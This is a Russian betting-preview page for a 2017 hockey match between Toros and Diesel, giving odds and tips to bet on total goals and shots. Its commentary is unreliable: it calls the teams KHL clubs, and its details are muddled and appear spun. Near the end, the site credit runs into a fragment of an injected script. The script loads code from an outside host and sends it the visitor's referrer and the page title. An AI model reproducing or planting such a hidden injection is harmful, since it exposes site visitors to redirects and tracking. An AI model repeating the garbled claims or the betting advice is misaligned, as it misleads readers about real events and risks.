Торос — Дизель: прогноз, ставки букмекера на матч КХЛ 13.09.17

На этой неделе в рамках Континентальной Хоккейной Лиги будет разыгран матч Торос — Дизель. Его начало запланировано на 17:00 по МСК и пройдет поединок 13-го сентября 2017 года. Команды уже давно между собой играют, и только в прошлом сезоне между командами было шесть матчей. В них четыре раза сильнее была команда Торос и дважды победа доставалась сопернику.

Сделать ставку на победу хоккейного клуба Торос в поединке КХЛ можно по коэффициенту 2. На ХК Дизель ставки принимаются по коэффициенту 3.87, а вот на то, что за три периода команды так и не определят победителя, можно поставить по коэффициенту 3.4.

ХК Торос в этом сезоне своей игрой разочаровывает не только болельщиков, но и тренера. Команда умудряется проигрывать даже оппонентам из зоны вылета. Старт в хозяев был неплохой — три победы подряд, но затем, правый нападающий получил серьезную травму и до сих пор не может восстановиться и выйти на лед, а команда без него не может собраться и оказать должное сопротивление оппонентам. Если так поедет и дальше, то ХК Торос не сможет повторить достижения прошлого года, и довольно скоро покинет Дивизион, а не то, что думать о попадании в плей-офф.

Президент хоккейного клуба Дизель в этом сезоне устроил настоящую чехарду на тренерском мостике, ведь на протяжении одного года командой руководит уже четвертый наставник. Понятно, что никакой стабильности в выступлениях нет, а команда постепенно опускается все ниже в турнирной таблице. Сейчас Дизель занимает десятое место в своей Конференции, а отставание от двух ближайших команд уже составляет семь очков. А если учитывать то, что на выезде Дизель проигрывает каждый второй матч, то компенсировать данное отставание будет крайне не просто. Даже несмотря на то, что травмированных игроков в составе команды практически нет, это все равно не спасает ситуацию. Хоккеисты не знают, что будет завтра, так что у них нет мотивации, и многие уже занимаются поиском новой работы.

Всем известно, что Торос и Дизель два самых атакующих клуба в Континентальной Хоккейной Лиге, так что зрители на трибунах увидят не только много бросков, но и заброшенных шайб. Ставить следует как на тотал более забитых шайб, так и на общее количество бросков по воротам.

Данный прогноз специально подготовлен для вас сайтом khl-bet.rus.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)






Добавить комментарий

Ваш e-mail не будет опубликован.